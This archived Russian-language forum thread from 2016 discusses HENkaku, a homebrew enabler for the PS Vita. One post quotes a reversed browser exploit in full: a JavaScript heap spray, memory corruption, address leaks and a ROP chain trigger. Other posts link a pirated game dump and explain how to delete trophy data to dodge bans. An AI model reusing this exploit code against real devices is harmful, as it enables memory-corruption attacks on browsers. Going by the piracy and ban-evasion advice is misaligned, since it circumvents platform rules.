PSPx форум

PSPx форум (https://www.pspx.ru/forum/index.php)
-   Архив (https://www.pspx.ru/forum/forumdisplay.php?f=304)
-   -   [3.60] HENkaku - Homebrew ENabler для PS Vita и PSTV (https://www.pspx.ru/forum/showthread.php?t=106214)

Zuriy 29.07.2016 13:10

[3.60] HENkaku - Homebrew ENabler для PS Vita и PSTV
 
Вложений: 1

http://i.imgur.com/aYh7nQe.pngЧто такое HENkaku? Вложение 11383
HENkaku - это первый HEN (Homebrew ENabler) для PS Vita и PSTV.
Это типа джейлбрейка для iPhone или root для Android устройств.
Homebrew - это игры и приложения, созданные сторонними разработчиками и не утверждены, не подписаны официально. Например, VitaDoom является портом классической игры DOOM и mGBA позволяет играть ромы от Game Boy Advance. Вы можете найти больше примеров в нашей витрине showcase.

Самая хорошая новость для всех, что HENkaku распространяется 100% бесплатно, без рекламы, без пожертвований.

Как я могу получить его?
Посетите сайт https://henkaku.xyz со встроенного веб-браузера PS Vita и нажмите кнопку "Install" для установки HENkaku. Вы должны делать это каждый раз при перезагрузке консоли, то есть, каждый раз, когда вы выключаете консоль и включаете её снова.

Что для этого требуется?
Вам нужна консоль PS Vita или PSTV с прошивкой 3.60. К сожалению, не представляется возможным запустить HENkaku на более новой версии прошивки, а также, не представляется возможным понизить прошивку системы, если вы обновите её на более старшую версию.

Кроме того, нужна карта памяти любого размера, по меньшей мере, 10 МБ свободного пространства. Внутренняя память в настоящее время не поддерживается. Чтобы перевести homebrew на устройство, вам также понадобится клиент FTP для вашего компьютера. Мы рекомендуем FileZilla. И, наконец, необходимо подключение к Интернету, чтобы установить HENkaku.
  • PS Vita с прошивкой 3.60
  • Интернет-соединение
  • FTP-клиент на компьютере
  • Карта памяти
Важно, чтобы вы никогда не обновляли Vita мимо 3,60, если вы хотите использовать HENkaku сейчас или в будущем. Если вы сделаете обновление, все установленные homebrew больше не будут работать и вы не сможете установить любое homebrew в будущем.

Способы оффлайн установки:


Derrik_Gotu 29.07.2016 13:32

инструкция по установке -> http://signedisos.narod.ru/forum/24-45-1

Установили кто-то уже анч вроде, который слитый с sdk
Нажмите для увеличения

capricorn_034 29.07.2016 13:58

Цитата:

Сообщение от Zuriy (Сообщение 1104123)
эмм Кажись Полноценная победа !

не полноценная еще... Здесь написано:
"Он (HEN) не даёт вам возможности ставить и запускать бэкапы или какой-либо пиратский контент.Он не отключает функции DRM. Он не позволяет вам декриптовать игры."
Оригинал
It does not let you install or run Vita “backups”, warez, or any pirated content. It does not disable any DRM features. It does not let you decrypt encrypted games.

COOLERbyPSP 30.07.2016 00:16

Эмм. А vHBL теперь можно поставить же? Игры от PSP запускать?
А ещё интересует подмена списка совместимости PS TV (Vita TV)

Ок, про список сам нашел)
http://wololo.net/2016/07/29/re-enab...-vita-henkaku/

erutan 30.07.2016 01:07

Цитата:

Сообщение от COOLERbyPSP (Сообщение 1104130)
Эмм. А vHBL теперь можно поставить же? Игры от PSP запускать?
А ещё интересует подмена списка совместимости PS TV (Vita TV)

wololo про vhbl на 3.60

>> Gotcha, makes sense…what about psp iso’s?
>>>>Wont work either, because PSP ISOs (and PS1 games) will require kernel mode access as well.

COOLERbyPSP 30.07.2016 02:02

Чёт залил я список (41 байт?), а "несовместимая" игра всё равно ругается. Страаанно...
PlayStation All-Stars Battle Royale запускаю, если что.

Оу, я что-то упустил, надо ur0:shell/db/app.db ковырять :0

Поковырял, залил обратно, ничего не изменилось :lol:

Цитата:

Сообщение от Cheska July 29, 2016 at 4:58 pm
Vita Cartridges are working great! The only problem comes from digital downloads now. For instance, Neptunia 1 and Tetris are not working. Any ideas on what it would take to get those off the white list, or are digital downloads hard coded to not work maybe?

Может поковырять какой-нибудь param.sfo? :0
О, можно картриджи дампить, в файлзилле вручную путь /gro0: прописать =)

Пробую сдампить первую Диву с яп карика (PCSG00074) :drinks:

Кстати, .rif прямо на карике, это нормально вообще?
Сдампил файлы и...ничего не могу открыть :lol: Видимо, усё зашифровано (ожидаемо, не правда ли?). Если надо кому - залью на облако архив (2.67Гб)

COOLERbyPSP 30.07.2016 10:10

Ждём RetroArch
Будет забавно, если кто-то портанёт PPSSPP :lol:
http://i.imgur.com/aHsKeYV.png

wl@d 30.07.2016 14:05

Надо ещё подождать что бы игры прлноценно запускать от виты,псп?у самого виты нет,чисто интересно что получится...

Izotov 30.07.2016 16:39

COOLERbyPSP, с железом виты это фантастика. А про все остальное просто надо все эмули перекомпилировать. Они под rejuvenate
http://buildbot.libretro.com/nightly/playstation/vita/

13thAngel 31.07.2016 17:58

А что насчёт слим-версии консоли? Её можно будет ломануть данной прогой?

COOLERbyPSP 31.07.2016 18:48

Цитата:

Сообщение от 13thAngel (Сообщение 1104166)
А что насчёт слим-версии консоли?

Пофиг, у меня, вон, вообще без экрана :D

Derrik_Gotu 31.07.2016 19:21

файлы эксплоита -> https://cloud.mail.ru/public/LoZE/68TswYdwg

COOLERbyPSP 31.07.2016 21:29

И бОльшую часть архива занимает картинка, которая без почти_не_видимого_градиента могла бы весить ~3Кб вместо 159 :lol:

http://puu.sh/ql29c/0fcb4e7da0.png

COOLERbyPSP 01.08.2016 00:23

Список всех (?) хоумбрю на данный момент =)
А вот эта новость ещё интереснее :crazy:

Zuriy 01.08.2016 15:42

Цитата:

Сообщение от COOLERbyPSP (Сообщение 1104172)
Список всех (?) хоумбрю на данный момент =)
А вот эта новость ещё интереснее :crazy:

Воу Воу ! Это уже прогресс какой то
если у них получилось, может этим алгоритмом можно дешифровать больше игр ?
осталось научиться их запускать расшифрованными и дрм оббходить

COOLERbyPSP 01.08.2016 23:27

:lol:
http://i80.fastpic.ru/big/2016/0802/...6c55ce302a.png

erutan 02.08.2016 01:50

http://wololo.net/2016/08/01/majorto...-now-possible/

Теперь возможен моддинг игр (но дрм не обошли, так что модифицировать игру можно только если она у тебя есть).
Потенциально открывает возможность как к модам как таковым, так и к неофициальным переводам (jap > eng , eng > rus и тд)

riku.kh3 03.08.2016 07:52

Чёт не хочется из-за каких-то там кривых, сделанных одним кликом, портов эмуляторов рисковать баном как PSN-аккаунта со всеми купленными на нём играми, так и баном самой железки.

Ничего принципиально нового, насколько я понял, нет. Все это давно было доступно на ранних FW. Чтобы пиратить надо декриптовать eboot со всеми модулями, не факт что данный хак технически на это способен.

acidant 03.08.2016 09:09

Ну баню уже можно обойти лесом... http://wololo.net/2016/08/03/molecul...t-prying-eyes/

riku.kh3 03.08.2016 10:29

Ну-ну. Там гораздо больше в бэкграунде всего происходит и отправляется на серверы, чем в этом списке для хомячков. Риск остается. Делали так уже на PS3.

Vlad510 04.08.2016 09:19

Я полностью поддерживаю:riku.kh3!!Поэтому смысл в этих хомках??Т.к лучше-бы реально Виту ломанули-бы чем заниматься запуском хомок ,на Вите!!Т.к ведь в хомки даже ,на ПС3 любой взломанной для пираток можно сыграть!Т.к ведь Вита уже пылится без взлома 6й год у хакеров:(:(:(!

Vlad510 добавил 04.08.2016 в 09:19
Пожалуйстааа,не молчите ,на мой вопросик!

acidant 04.08.2016 13:00

Vlad510 так можно и про авто говорить, нафига вы им колеса прикручиваете, дела ли бы сразу парящими над землей.
Данный хак позволяет в режиме ридонли пощупать кишки системы. дальше-больше. вон sega saturn спустя 20 лет ломанули, 6 лет - ни о чем))

doubledeath 04.08.2016 15:59

Так если отвязать виту от учётки, и сбросить к заводским настройкам, а потом банально не указывать свои учётные данные в консоли... то никто никого не забанит, разве нет?

COOLERbyPSP 04.08.2016 22:29

По эмуляторам SNES:
catsfc_plus_libretro намного быстрее Snes9xVITA.
У последнего просадки в Зельде 10-15фпс иногда. И почти всегда лагающий звук. На первом проблем не вижу от слова вообще.
Ещё б XMB завезти в RetroArch для Виты "из коробки"

akela1979 05.08.2016 01:51

Henkaku exploit - HTML reversed
 
http://pastebin.com/bYA4xGaQ
The reconstructed payload can be find here: payload.bin (2.85 KB)

And an analysis of the payload's binary data can be found here: http://pastebin.com/gxc0cX1i
reversed
Код:

<****** src='payload.js'></******>
 
<******>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;
 
var m = 0x40 + payload[16/4];  /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4;                /* 476 */
 
var _dview = null;
 
/*
    Wrap two uint32s into double precision
*/
function u2d(low, hi)
{
  if (!_dview)
    _dview = new DataView(new ArrayBuffer(16));
 
  _dview.setUint32(0, hi);
  _dview.setUint32(4, low);
  return _dview.getFloat64(0)
}
 
/*
    Unwrap uints from double
*/
function d2u(d)
{
  if (!_dview)
    _dview = new DataView(new ArrayBuffer(16));
 
  _dview.setFloat64(0, d);
  return {low:_dview.getUint32(4),hi:_dview.getUint32(0)}
}
 
// Temporary space to store Element object
var aspace_temp = new Uint32Array(1024);
 
var word1 = 0;
var word2 = 0;
 
function swap(offset)
{
  word1 = aspace32[offset/4];
  word2 = aspace32[offset/4 + 1];
  return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
}
 
r = 0x4000;
textareas = new Array(r);
aspace_arr = new Array(r);
t = 0x1344;
n = 0x66656463;
o = 0x55555555;
 
 
for (var i = 0; i < aspace_arr.length; ++i)
{
  aspace_arr[i] = new Uint32Array(0x1344/4);
  var e = document.createElement("textarea");
  e.rows = 0x66656463;
  textareas[i] = e;
}
 
/*
  Spray memory with Element objects
*/
for (var i = 0; i < 1024; ++i)
{
  var e = document.createElement("textarea");
  e.rows = 0x66656463;
  textareas.push(e);
}
 
var N = 0x3000;
var W = Array.prototype.constructor.apply(null,new Array(0x3000));
var j = 2048;
var q = new Array(2048);
var z = {};
 
var C = new Array(256);
 
z.toString = function()
            {
              W.push(12345);
 
              for (var r = 0; r < C.length; ++r)
              {
                var a = Array.prototype.constructor.apply(null, q);
                a[0] = 0;
                a[1] = 1;
                a[2] = 2;
                C[r] = a;
              } return""
            };
 
W[0] = z;
var G = u2d(0x80000000, 0x80000000);
 
for (var i = 1; i < 8192; ++i)
  W[i] = G;
 
W.sort();
contents = "";
cur = 0;
 
z.toString = function(){};
 
var I = null;
 
for (var i = 0; i < C.length; ++i)
{
  if(C[i].length != j)
  {
    I = C[i];
    break;
  }
}
 
var count = 0x20000000 - 0x11000;
 
for(; ; count--)
{
  if(I[count] != 0)
  {
    _dview.setFloat64(0, I[J]);
 
    if (_dview.getUint32(0) == t/4)
    {
      _dview.setUint32(0, 0xEFFFFFE0);
   
      I[J] = _dview.getFloat64(0);
      _dview.setFloat64(0, I[J - 2]);
 
      v = _dview.getUint32(4);
      _dview.setUint32(4, 0);
      _dview.setUint32(0, 0x80000000);
   
      I[J-2] = _dview.getFloat64(0);
   
      break;
    }
  }
}
 
target_aspace = null;
 
for (var i = 0; i < aspace_arr.length; ++i)
{
  if(aspace_arr[i].byteLength != t)
  {
    target_aspace = aspace_arr[i];
    break;
  }
}
 
if (!target_aspace)
{
  alert("failed");
  while(1){};
}
 
var aspace32 = target_aspace;
var fkvtable = v;
f = v;
 
/*
  Find one of the sprayed Element objects in memory
  by looking for the rows of the object
*/
 
for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
{
  if (aspace32[addr] == 0x66656463)
  {
    aspace32[addr] = 0x55555555;
    textarea_addr = addr * 4;
    found_element = true;
    break;
  }
}
 
if (!found_element)
{
  alert("Did not find Element signature");
  while(1){};
}
 
/*
  Change the rows of the Element object then scan the array of
  sprayed objects to find an object whose rows have been changed
*/
 
var found_corrupted = false;
var corrupted_textarea;
 
for (var i = 0; i < textareas.length; ++i)
{
  if(textareas[i].rows == 0x55555555)
  {
    corrupted_textarea = textareas[i];
    found_corrupted = true;
    break;
  }
}
 
if (!found_corrupted)
{
  alert("Did not find corrupted textarea");
  while(1){};
}
 
var vtidx = textarea_addr - 0x70;
var textareavptr = aspace32[vtidx/4];
scewkbase = textareavptr - 0xABB65C;
scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
p = swap(scewkbase + 0x85D2E4) - 0x22D65;
d = swap(p + 0x2C688C) - 0x9E5;
g = swap(d + 0x3BC4) - 0xDC2D;
scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
k = swap(g + 0x18BF4) - 0xD59;
b = swap(k + 0x9AB8) - 0x49CD;
 
// Copy vtable
for (var i = 0; i < 64; i++)
  aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];
 
aspace32[vtidx/4] = fkvtable;
 
// Save Element object
for (var i = 0; i < 0x30; ++i)
  aspace_temp[i] = aspace32[vtidx/4 + i];
 
// Call setjmp
aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;
 
// Undefine scrollLeft
corrupted_textarea.scrollLeft = 0;
 
// Save payload address (jmp context)
payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
payload_addr -= 0xEF818;
 
// Restore Element object
for (var i = 0; i < 0x30; ++i)
  aspace32[vtidx/4 + i] = aspace_temp[i];
 
payload_stack = payload_addr + 0x40;
payload_code = payload_addr + 0x10000;
payload_off = payload_addr/4;
 
// Build ROP payload
for (var i = 0; i < payload.length; ++i,++payload_off)
{
  // Reached the end of ROP header (first 0x770 bytes)
  if (i == 476)
    payload_off = payload_code/4;
 
  switch(relocs[i])
  {
    case 0:
      aspace32[payload_off] = payload[i];
      break;
    case 1:
      aspace32[payload_off] = payload[i] + payload_stack;
      break;
    case 2:
      aspace32[payload_off] = payload[i] + scewkbase;
      break;
    case 3:
      aspace32[payload_off] = payload[i] + scekernbase;
      break;
    case 4:
      aspace32[payload_off] = payload[i] + scelibcbase;
      break;
    case 5:
      aspace32[payload_off] = payload[i] + g;
      break;
    case 6:
      aspace32[payload_off] = payload[i] + scenetbase;
      break;
    case 7:
      aspace32[payload_off] = payload[i] + b;
      break;
    default:
      alert("wtf?");
      alert(i + " " + relocs[i])
  }
}
 
// Trigger ROPchain
aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8;  /* LDM R1 gadget */
 
var rchainaddr = fkvtable + 0x100;
 
aspace32[rchainaddr/4 + 5] = payload_code;
aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;
 
alert("Welcome to HENkaku!");
 
// Set scrollLeft to ROP chain
corrupted_textarea.scrollLeft = rchainaddr;
 
alert("that's it");
</******>


COOLERbyPSP 05.08.2016 17:29

Эмулятор NDS теперь умеет выбирать ромы и поддерживает JIT
https://github.com/masterfeizz/DeSmuME-Vita/releases

Mishanstvo 08.08.2016 18:26

http://www.mediafire.com/download/75...ita+backup.vpk
Adventure time psvita, never released game (dumped from devkit)
Install from Vitashell 0.7

trophies work, enjoy the ban

-- hf

riku.kh3 08.08.2016 20:54

Цитата:

Сообщение от Mishanstvo (Сообщение 1104268)
http://www.mediafire.com/download/75...ita+backup.vpk
Adventure time psvita, never released game (dumped from devkit)
Install from Vitashell 0.7

trophies work, enjoy the ban

-- hf

Ну вот, EBOOT и PRX-модули в незакриптованном FSELF формате. То, что доктор прописал.
Может мотивирует кого-нибудь покопать в сторону декриптовки подписанного контента.

SILENT-Pavel 09.08.2016 03:49

Цитата:

Сообщение от Derrik_Gotu (Сообщение 1104125)
инструкция по установке -> http://signedisos.narod.ru/forum/24-45-1

Установили кто-то уже анч вроде, который слитый с sdk
Нажмите для увеличения

И как работает или только висит плейсхолдером и черноэкранит?

riku.kh3 10.08.2016 19:54

Попробовал пересобрать ваш "uncharted" под HENkaku, проверьте :P
http://rgho.st/6ghyyV7Vr

vampula 11.08.2016 16:34

Доступны инструменты для устоновки henkaku в оффлайне с виты. И по взлому: Henkaku команда говорила, что отдаст исходники раскодировавшим полностью их эксплоит. Как они утверждают, на эту раскодировку уйдет минимум несколько месяцев. И это только раскодировка, про взлом drm вообще наверно забыть можно на несколько лет. Кароче, ставим все 3.60 с оффлайн хенкаку и кладём виту еще на неопределённый срок на полку.

lupus 11.08.2016 18:00

riku.kh3, отличный анч на 2 метра 🙃

Сдампил и разобрал картриджную версию Gravity Rush, теперь бы попробовать собрать назад и подсунуть в виде патча. Если заведётся - можно разбирать формат хранения текста и переводить на русский...

Mishanstvo 11.08.2016 19:11

lupus, очень жду перевода) на 4pda есть ветка с уже готовым переводом.

Cepera 11.08.2016 23:46

В этом HENkaku спрятан ядреный эксплойт чтоль?

Cepera добавил 11.08.2016 в 23:46
Время приключений работает, анчартед - нет, ошибка C1-2613-2

vampula 12.08.2016 01:02

Cepera, станет понятно после полного разбора кода. По слухам - да, возможно таки карнел.

Mishanstvo 12.08.2016 09:39

vampula, а можно ссылку где ведутся эти работы?

vampula 12.08.2016 11:48

Mishanstvo, вот ссылка на личный сайт разраба henkaku: http://yifan.lu/2016/08/05/henkaku-koth-challenge/ (заходить через анонимайзер), в комментах к статье последней есть посты декодеров с их прогрессами.
Также можно следить за твиттером разраба: https://mobile.twitter.com/yifanlu?p=i

lupus 12.08.2016 11:59

Пошаговый мануал по удалению трофеев игры Adventure Time во избежание бана за установку вареза.
1. Запускаем molecularshell или vitashell 0.7
2. Удаляем с консоли следующие папки:
ur0:user/00/trophy/conf/NPWR07969_00
ur0:user/00/trophy/data/NPWR07969_00
ur0:user/00/trophy/data/sce_trop
3. Выходим в livearea и запускаем системное приложение "Призы"
4. Видим сообщение о восстановлении информации о трофеях и ждём окончания процесса
5. Все трофеи, за исключение полученных в Adventure Time будут восстановлены.

Надо бы написать автору History deleter'а, чтобы добавил данную опцию в софтинку или самому попробовать поковырять его сырцы.

Mishanstvo 12.08.2016 16:44

А почему только 333 и 444 Мгц? Почему нельзя работать на других частотах? Если будет полный взлом, будет доступ ко всему процессору?

COOLERbyPSP 12.08.2016 22:54

Цитата:

Сообщение от Mishanstvo (Сообщение 1104338)
Если будет полный взлом, будет доступ ко всему процессору?

Вполне возможно. Особо радоваться, впрочем, тоже не стоит, ибо это грозит повышением энергопотребления и тепловыделения.
Ладно ещё PS TV можно разобрать и радиатор поставить, а вот с обычной версией, скорее всего, ничего не сделать.


Текущее время: 20:22. Часовой пояс GMT +3.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc. Перевод: zCarot
PSPx Forum - Сообщество фанатов игровых консолей.